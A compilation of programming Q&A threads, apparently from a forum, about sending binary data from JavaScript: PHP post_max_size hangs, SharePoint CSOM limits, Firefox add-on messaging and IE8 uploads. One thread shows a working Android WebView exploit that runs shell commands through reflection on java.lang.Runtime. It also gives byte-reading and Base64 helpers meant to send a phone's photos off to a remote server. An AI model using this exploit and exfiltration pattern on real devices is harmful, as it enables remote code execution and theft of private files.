How to send a binary file to the server using JavaScript

I'm working on file encryption for my messenger, and I'm struggling with uploading the file after the encryption is done.
The encryption itself seems fine in terms of performance, but when I try to upload, the browser hangs completely. The profiler logs "small GC" events endlessly, and the yellow "unresponsive script" bar appears every 10 seconds.
What I already tried:
Read the file with FileReader into an ArrayBuffer, turn it into a plain Array, encrypt it, then create a FormData object, create a File from the data, append it to the FormData and send it. This worked fast with the original, untouched file (around 1.3 MB) when I skipped the encryption, but with the encrypted "fake" File object the uploaded file came out at 4.7 MB and was not usable.
Send it as a plain POST field (multipart form-data encoding). The data is corrupted after PHP saves it this way.
Send it as a Base64-encoded POST field. This finally started working after I found a fast function for converting a binary array to a Base64 string (btoa() gave wrong results after encode/decode). But when I tried a file of 8.5 MB, it hung again.
I tried moving the extra data into the URL string and sending the file as a Blob, as described here. No success; the browser still hangs.
I tried passing the Blob constructor a plain Array, then a Uint8Array made from it, and finally I tried sending a File as suggested in the docs, but still the same result, even with a small file.
What is wrong with the code? HDD load is at 0% when the hang happens, and the files in question are really quite small.
Here is what I get as output from my server script when I emergency-terminate the JS script by pressing the stop button:
Warning: Unknown: POST Content-Length of 22146226 bytes exceeds the limit of 8388608 bytes in Unknown on line 0
Warning: Cannot modify header information - headers already sent in Unknown on line 0
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent in D:\xmessenger\upload.php on line 2
Array ( )
Here is my JavaScript:
function uploadEncryptedFile(nonce) {
    if (typeof window['FormData'] !== 'function' || typeof window['File'] !== 'function') return
    var file_input = document.getElementById('attachment')
    if (!file_input.files.length) return
    var file = file_input.files[0]
    var reader = new FileReader();
    reader.addEventListener('load', function() {
        var data = Array.from(new Uint8Array(reader.result))
        var encrypted = encryptFile(data, nonce)
        //return // Here it never hangs
        var form_data = new FormData()
        form_data.append('name', file.name)
        form_data.append('type', file.type)
        form_data.append('attachment', arrayBufferToBase64(encrypted))
        /* form_data.append('attachment', btoa(encrypted)) // Does not help */
        form_data.append('nonce', nonce)
        var req = getXmlHttp()
        req.open('POST', 'upload.php?attachencryptedfile', true)
        req.onload = function() {
            var data = req.responseText.split(':')
            document.getElementById('filelist').lastChild.realName = data[2]
            document.getElementById('progress2').style.display = 'none'
            document.getElementById('attachment').onclick = null
            encryptFilename(data[0], data[1], data[2])
        }
        req.send(form_data)
        /* These lines also fail when the file is larger */
        /* req.send(new Blob(encrypted)) */
        /* req.send(new Blob(new Uint8Array(encrypted))) */
    })
    reader.readAsArrayBuffer(file)
}
function arrayBufferToBase64(buffer) {
    var binary = '';
    var bytes = new Uint8Array(buffer);
    var len = bytes.byteLength;
    for (var i = 0; i < len; i++) {
        binary += String.fromCharCode(bytes[i]);
    }
    return window.btoa(binary);
}
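For what it's worth, the Base64 detour (and the per-byte string concatenation it requires) can be avoided entirely by sending the encrypted bytes as binary. Below is a minimal sketch, assuming encryptFile returns a plain array of byte values as in the question; buildUploadForm is a hypothetical helper. Note that the Blob constructor takes an array of parts, so the typed array must be wrapped in []: new Blob(encrypted) would stringify every array element, which would also explain a 1.3 MB file ballooning into 4.7 MB of decimal text.

```javascript
// Sketch: append the encrypted bytes to the form as a binary Blob
// instead of a Base64 string. buildUploadForm() is a hypothetical
// helper; 'encrypted' is a plain array of byte values (0-255).
function buildUploadForm(encrypted, file, nonce) {
    // Note the wrapping array: new Blob(parts) expects an ARRAY of parts.
    var blob = new Blob([new Uint8Array(encrypted)], { type: 'application/octet-stream' })
    var form_data = new FormData()
    form_data.append('name', file.name)
    form_data.append('type', file.type)
    form_data.append('nonce', nonce)
    // The third argument sets the filename of the multipart part;
    // PHP then exposes the data under $_FILES['attachment'].
    form_data.append('attachment', blob, file.name)
    return form_data
}
```

With this, PHP would read the upload from $_FILES['attachment']['tmp_name'] instead of base64_decode(), and no 4/3 Base64 inflation counts against post_max_size (though upload_max_filesize still applies).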
Here is my PHP handler code:
if (isset($_GET['attachencryptedfile'])) {
    $entityBody = file_get_contents('php://input');
    if ($entityBody == '') exit(print_r($_POST, true));
    else exit($entityBody);
    if (!isset($_POST["name"])) exit("Error");
    $name = @preg_replace("/[^0-9A-Za-z._-]/", "", $_POST["name"]);
    $nonce = @preg_replace("/[^0-9A-Za-z+\\/]/", "", $_POST["nonce"]);
    if ($name == ".htaccess") exit();
    $data = base64_decode($_POST["attachment"]);
    //print_r($_POST);
    //exit();
    if (strlen($data) > 1024*15*1024) exit('<script type="text/javascript">parent.showInfo("File is too large"); parent.document.getElementById(\'filelist\').removeChild(parent.document.getElementById(\'filelist\').lastChild); parent.document.getElementById(\'progress2\').style.display = \'none\'; parent.document.getElementById(\'attachment\').onclick = null</script>');
    $uname = uniqid()."_".str_pad($_SESSION['xm_user_id'], 6, "0", STR_PAD_LEFT).substr($name, strrpos($name, "."));
    file_put_contents("upload/".$uname, $data);
    mysql_query("ALTER TABLE `attachments` AUTO_INCREMENT=0");
    mysql_query("INSERT INTO `attachments` VALUES('0', '".$uname."', '".$name."', '0', '".$nonce."')");
    exit(mysql_insert_id().":".$uname.":".$name);
}
HTML form:
<form name="fileForm" id="fileForm" method="post" enctype="multipart/form-data" action="upload.php?attachfile" target="ifr">
    <div id="fileButton" title="Attach file" onclick="document.getElementById('attachment').click()"></div>
    <input type="file" name="attachment" id="attachment" title="Attach file" onchange="addFile()" />
</form>

UPD: the issue is not solved, unfortunately; my answer is only partially correct. I made a silly mistake in the code (I forgot to update the server side) and found another possible cause of the hang. If I submit a basic POST form (x-www-form-urlencoded) and the PHP script tries to execute this line ($uname is defined, $_FILES is an empty array):
if (!copy($_FILES['attachment']['tmp_name'], "upload/".$uname)) exit("Error");
then the whole thing hangs again. If I terminate the script, the server response code is 200 and the body contents are just fine (I have error output enabled on my dev machine). I know it is a bad thing to call copy() with a first argument that is entirely undefined, but even a server error 500 must not hang the browser in such a way (by the way, the latest version of Firefox is also affected).
I have Apache 2.4 on Windows 7 x64 and PHP 5.3. Can someone please verify this? Maybe a bug should be filed with the Apache/Firefox teams?
Oh my God. This terrible behavior was caused by... post_max_size = 8M set in php.ini. And files smaller than 8 MB actually did not hang the browser, as I eventually figured out.
The last question is: why? Why can't Apache/PHP (I have Apache 2.4, by the way; it is not old) somehow gracefully abort the connection and tell the browser that the limit was exceeded? Or maybe it is a bug in the XHR implementation that does not apply to a basic form submit. Anyway, this will be useful for people who stumble upon it.
By the way, I tried it in Chrome with the same POST size limit, and there it does not hang as completely as in Firefox (the request is still stuck in a hung-up state with "no response available", but the JS engine and the UI are not blocked).
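A cheap client-side guard would have surfaced this immediately: check the Base64-inflated payload size against the server's limit before sending. A minimal sketch; the 8 MB constant mirrors PHP's default post_max_size and is an assumption you would keep in sync with your php.ini:

```javascript
// Sketch: reject oversized uploads on the client instead of letting the
// request die against PHP's post_max_size. The limit is an assumption;
// keep it in sync with your php.ini.
var POST_MAX_BYTES = 8 * 1024 * 1024

function fitsPostLimit(rawByteLength) {
    // Base64 encodes every 3 input bytes as 4 output characters,
    // so the POST body grows by roughly 4/3, plus some field overhead.
    var base64Length = Math.ceil(rawByteLength / 3) * 4
    var overhead = 1024 // rough allowance for the other form fields
    return base64Length + overhead <= POST_MAX_BYTES
}
```

The 22,146,226-byte body from the warning above corresponds to roughly 16.6 MB of raw data, which a check like this would have rejected up front.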

Related

Running into a 1.7mb limit with CSOM based upload functionality

Running into the following error when I try to upload files larger than 1.7 MB:
"Request failed with error message - The request message is too big. The server does not allow messages larger than 2097152 bytes. . Stack Trace - undefined"
function uploadFile(arrayBuffer, fileName)
{
    // Get the client context, web and list objects.
    var clientContext = new SP.ClientContext();
    var oWeb = clientContext.get_web();
    var oList = oWeb.get_lists().getByTitle('CoReTranslationDocuments');
    var bytes = new Uint8Array(arrayBuffer);
    var i, length, out = '';
    for (i = 0, length = bytes.length; i < length; i += 1)
    {
        out += String.fromCharCode(bytes[i]);
    }
    var base64 = btoa(out);
    var createInfo = new SP.FileCreationInformation();
    createInfo.set_content(base64);
    createInfo.set_url(fileName);
    var uploadedDocument = oList.get_rootFolder().get_files().add(createInfo);
    clientContext.load(uploadedDocument);
    clientContext.executeQueryAsync(QuerySuccess, QueryFailure);
}
We just switched from SP2013 to SharePoint Online. This code previously worked well with even larger files. Does the 2 MB limit refer to the file being uploaded or to the size of the REST request?
I also read about a possible solution using a file stream; is that something I can use in this scenario?
Any suggestions or modifications to the code would be much appreciated.
SharePoint has its own limits for CSOM. Unfortunately, these limits cannot be configured in Central Administration and also cannot be set using CSOM, for obvious reasons.
When googling the issue, the solution usually given is to set the ClientRequestServiceSettings.MaxReceivedMessageSize property to the desired size.
Call the following PowerShell script from the SharePoint Management Shell:
$ws = [Microsoft.SharePoint.Administration.SPWebService]::ContentService
$ws.ClientRequestServiceSettings.MaxReceivedMessageSize = 209715200
$ws.Update()
This will set the limit to 200 MB.
However, in SharePoint 2013 Microsoft apparently added another configuration setting that also limits the amount of data the server will process from a CSOM request (why anyone would configure this one differently is beyond me...). After reading a very, very long SharePoint log file and crawling through some disassembled SharePoint server code, I found that this parameter can be set via the ClientRequestServiceSettings.MaxParseMessageSize property.
We are now using the following script with SharePoint 2013 and it works great:
$ws = [Microsoft.SharePoint.Administration.SPWebService]::ContentService
$ws.ClientRequestServiceSettings.MaxReceivedMessageSize = 209715200
$ws.ClientRequestServiceSettings.MaxParseMessageSize = 209715200
$ws.Update()
Hope that saves some people a headache!
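In SharePoint Online neither script applies, since you don't control the farm; there the practical route is keeping each request below the limit. Below is a minimal, generic sketch of slicing a file's bytes into sub-limit chunks. The chunked-upload CSOM methods sometimes suggested for feeding such chunks (startUpload/continueUpload/finishUpload on SP.File) are from memory, so verify them against your API version before relying on them:

```javascript
// Sketch: split an ArrayBuffer into pieces that each stay below the
// 2 MB CSOM message limit (a 1 MB chunk size leaves room for request
// overhead). Feeding the chunks to an upload API is left to the caller.
function sliceIntoChunks(buffer, chunkSize) {
    var bytes = new Uint8Array(buffer)
    var chunks = []
    for (var offset = 0; offset < bytes.length; offset += chunkSize) {
        // subarray() clamps the end index, so the last chunk may be shorter.
        chunks.push(bytes.subarray(offset, offset + chunkSize))
    }
    return chunks
}
```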

How to message child process in Firefox add-on like Chrome native messaging

I am trying to emulate Chrome's native messaging feature using Firefox's add-on SDK. Specifically, I'm using the child_process module along with the emit method to communicate with a python child process.
I am able to successfully send messages to the child process, but I am having trouble getting messages sent back to the add-on. Chrome's native messaging feature uses stdin/stdout. The first 4 bytes of every message in both directions represents the size in bytes of the following message so the receiver knows how much to read. Here's what I have so far:
Add-on to Child Process
var utf8 = new TextEncoder("utf-8").encode(message);
var latin = new TextDecoder("latin1").decode(utf8);
emit(childProcess.stdin, "data", new TextDecoder("latin1").decode(new Uint32Array([utf8.length])));
emit(childProcess.stdin, "data", latin);
emit(childProcess.stdin, "end");
Child Process (Python) from Add-on
text_length_bytes = sys.stdin.read(4)
text_length = struct.unpack('i', text_length_bytes)[0]
text = sys.stdin.read(text_length).decode('utf-8')
Child Process to Add-on
sys.stdout.write(struct.pack('I', len(message)))
sys.stdout.write(message)
sys.stdout.flush()
Add-on from Child Process
This is where I'm struggling. I have it working when the length is less than 255. For instance, if the length is 55, this works:
childProcess.stdout.on('data', (data) => { // data is '7' (55, UTF-8 encoded)
    var utf8Encoded = new TextEncoder("utf-8").encode(data);
    console.log(utf8Encoded[0]); // 55
});
But, like I said, it does not work for all numbers. I'm sure I have to do something with TypedArrays, but I'm struggling to put everything together.
The problem here is that Firefox tries to read stdout as a UTF-8 stream by default. Since UTF-8 doesn't map every single-byte value to itself, you get corrupted characters for values like 255. The solution is to tell Firefox to read the stream in binary encoding, which means you'll have to manually parse the actual message content later on.
var childProcess = spawn("mybin", [ '-a' ], { encoding: null });
Your listener would then look like this:
var decoder = new TextDecoder("utf-8");
var readIncoming = (data) => {
    // Read the first four bytes, which indicate the size of the following
    // message. slice() copies, so .buffer is exactly these four bytes even
    // when 'data' is itself a subarray view with a non-zero offset.
    var size = (new Uint32Array(data.slice(0, 4).buffer))[0];
    //TODO: handle size > data.byteLength - 4
    // Read the message (the payload occupies bytes 4 .. 4 + size).
    var message = decoder.decode(data.subarray(4, 4 + size));
    //TODO: do stuff with message
    // Read the next message if there are more bytes.
    if (data.byteLength > 4 + size)
        readIncoming(data.subarray(4 + size));
};
childProcess.stdout.on('data', (data) => {
    // Convert the data string to a byte array.
    // The bytes got converted by char code, see https://dxr.mozilla.org/mozilla-central/source/addon-sdk/source/lib/sdk/system/child_process/subprocess.js#357
    var bytes = Uint8Array.from(data, (c) => c.charCodeAt(0));
    readIncoming(bytes);
});
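To sanity-check the framing on the add-on side, it helps to build a message the same way the reader expects it: a 4-byte little-endian length prefix followed by the UTF-8 payload. A minimal sketch (frameMessage is a hypothetical helper, not part of the SDK):

```javascript
// Sketch: produce a native-messaging-style frame, i.e. a 4-byte
// little-endian length prefix followed by the UTF-8 payload.
function frameMessage(text) {
    var payload = new TextEncoder().encode(text)
    var framed = new Uint8Array(4 + payload.length)
    // Write the length prefix explicitly as little-endian, matching what
    // struct.pack('I', ...) produces on typical little-endian machines.
    new DataView(framed.buffer).setUint32(0, payload.length, true)
    framed.set(payload, 4)
    return framed
}
```

Feeding such a frame through the parsing logic makes a handy unit test for lengths above 255, which is exactly where the UTF-8 misreading bites.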
Maybe is this similar to this problem:
Chrome native messaging doesn't accept messages of certain sizes (Windows)
Windows-only: Make sure that the program's I/O mode is set to O_BINARY. By default, the I/O mode is O_TEXT, which corrupts the message format as line breaks (\n = 0A) are replaced with Windows-style line endings (\r\n = 0D 0A). The I/O mode can be set using __setmode.

Handle the output of 'cat example.png' in JS

I am trying, out of interest, to do some remote code execution on my old Android phone. On old versions of the Android "WebView" component, there is a vulnerability that makes it possible to execute shell code and read the response via JS. The relevant code, taken from here, looks like this:
function execute(cmdArgs)
{
    return SmokeyBear.getClass().forName("java.lang.Runtime").getMethod("getRuntime", null).invoke(null, null).exec(cmdArgs);
}
function getContents(inputStream)
{
    var contents = "";
    var b = inputStream.read();
    while (b != -1) {
        var bString = String.fromCharCode(b);
        contents += bString;
        b = inputStream.read();
    }
    return contents;
}
[...]
var p = execute(["ls", "/mnt/sdcard/DCIM/Camera/"]);
input = getContents(p.getInputStream());
In this example we list the files in the Camera folder and store them in 'input' as a string, which worked fine for me.
I have read, however, that the same vulnerability could be used to exfiltrate whole media files. The problem is that I do not know what kind of data I get if I just remote-execute 'cat /path/to/example.png' on the phone. I want to submit the data to my (Python) web server. I tried running the above code, converting the bytes to a string (which contains a lot of gibberish), sending the string via an XMLHttpRequest, and then on my server just saving that string to a binary file. That didn't work, obviously. I strongly suspect I should Base64-encode the whole thing before transmission, but I don't even know how to retrieve the raw byte array from p.getInputStream(). It doesn't help that Google doesn't give me any meaningful results for 'javascript inputstream' at all...
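One way to do this is to collect the bytes the same way getContents() already does, just without converting them to a display string first. A sketch (readBytes and bytesToBase64 are hypothetical helpers built only from the per-byte InputStream.read() pattern above); btoa() is safe here because every array element stays in the 0-255 Latin-1 range:

```javascript
// Sketch: drain a Java InputStream into a plain array of byte values
// (0-255), then Base64-encode them for safe transport over XHR.
function readBytes(inputStream) {
    var bytes = []
    var b = inputStream.read()
    while (b !== -1) {
        bytes.push(b)
        b = inputStream.read()
    }
    return bytes
}

function bytesToBase64(bytes) {
    // Build a Latin-1 string where each char code equals one byte value;
    // btoa() then encodes it without any UTF-8 mangling.
    var binary = ''
    for (var i = 0; i < bytes.length; i++) {
        binary += String.fromCharCode(bytes[i])
    }
    return btoa(binary)
}
```

On the Python side the payload can then be decoded with base64.b64decode() and written to disk in binary mode.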

AJAX Upload file straight after downloading it (without storing)

I'm making a JavaScript script that is going to essentially save an old game development sandbox website before the owners scrap it (and lose all of the games). I've created a script that downloads each game via AJAX, and I would like to somehow upload it straight away, also using AJAX. How do I upload the downloaded file (stored in responseText, presumably) to a PHP page on another domain (one that has cross-origin headers enabled)?
I assume there must be a way of uploading the data from the first AJAX request without transferring the responseText to a second AJAX request (used to upload the file)? I've tried transferring the data, but as expected it causes huge lag (and can crash the browser), as the files can be quite large.
Is there a way for an AJAX request to upload individual packets as soon as they're received?
Thanks,
Dan.
You could use Firefox's moz-chunked-text and moz-chunked-arraybuffer response types. On the JavaScript side you can do something like this:
function downloadUpload() {
    var downloadUrl = "server.com/largeFile.ext";
    var uploadUrl = "receiver.net/upload.php";
    var dataOffset = 0;
    xhrDownload = new XMLHttpRequest();
    xhrDownload.open("GET", downloadUrl, true);
    xhrDownload.responseType = "moz-chunked-text"; // <- only works in Firefox
    xhrDownload.onprogress = uploadData;
    xhrDownload.send();
    function uploadData() {
        var data = {
            file: downloadUrl.substring(downloadUrl.lastIndexOf('/') + 1),
            offset: dataOffset,
            chunk: xhrDownload.responseText
        };
        xhrUpload = new XMLHttpRequest();
        xhrUpload.open("POST", uploadUrl, true);
        xhrUpload.setRequestHeader('Content-Type', 'application/json; charset=UTF-8');
        xhrUpload.send(JSON.stringify(data));
        dataOffset += xhrDownload.responseText.length;
    };
}
On the PHP side you need something like this:
$in = fopen("php://input", "r");
$postContent = stream_get_contents($in);
fclose($in);
$o = json_decode($postContent);
file_put_contents($o->file . '-' . $o->offset . '.txt', $o->chunk);
These snippets will just give you the basic idea, you'll need to optimize the code yourself.

How to upload a binary file in IE8 then send it to server using xmlhttprequest

I'm working on the web pages of an embedded device. To exchange data between the web page and the application on this device I use XMLHttpRequest.
Now I'm looking for a way to let the client upload a binary (to update the firmware of that device) to the server.
One big limitation: it needs to work in IE8 (a cross-browser solution would be ideal, but working in IE8 is mandatory first...).
In detail what I have to do :
Use the <input type='file'> to select the file on the client computer
Send the file (using xmlhttprequest?) to the server
The server will reassemble the file and do whatever it needs to do with it...
I was able to get a binary from the client to the server in chrome, but in IE8, my method was not compatible.
The relevant html file :
<input id="uploadFile" type="file" />
In the JavaScript, I tried different ways to fire a change event on the file input:
// Does not work in IE8 (I get an "Object doesn't support this property or method" error)
document.querySelector('input[type="file"]').addEventListener("change", function(e) ...
// Tried with jQuery; does not work in IE8 (I may not be using it correctly...)
$('upload').addEvent('change', function(e) ....
$('upload').change(function(e) ....
So my first problem is : how to do a onChange event with the input type file in IE8?
Here is the method I was using in Chrome (found on this page: http://www.html5rocks.com/en/tutorials/file/xhr2/ ), which does not work in IE8:
function upload(blobOrFile) {
    var xhr = new XMLHttpRequest();
    xhr.open('POST', '/server', true);
    xhr.onload = function(e) { ... };
    xhr.send(blobOrFile);
}
document.querySelector('input[type="file"]').addEventListener('change', function(e) {
    var blob = this.files[0];
    const BYTES_PER_CHUNK = 1024 * 1024; // 1MB chunk sizes.
    const SIZE = blob.size;
    var start = 0;
    var end = BYTES_PER_CHUNK;
    while (start < SIZE) {
        upload(blob.slice(start, end));
        start = end;
        end = start + BYTES_PER_CHUNK;
    }
}, false);
Because document.querySelector generates an error in IE8, I don't know whether the rest of this code works there (I hope it does!).
Any help and suggestion will be greatly appreciated!!!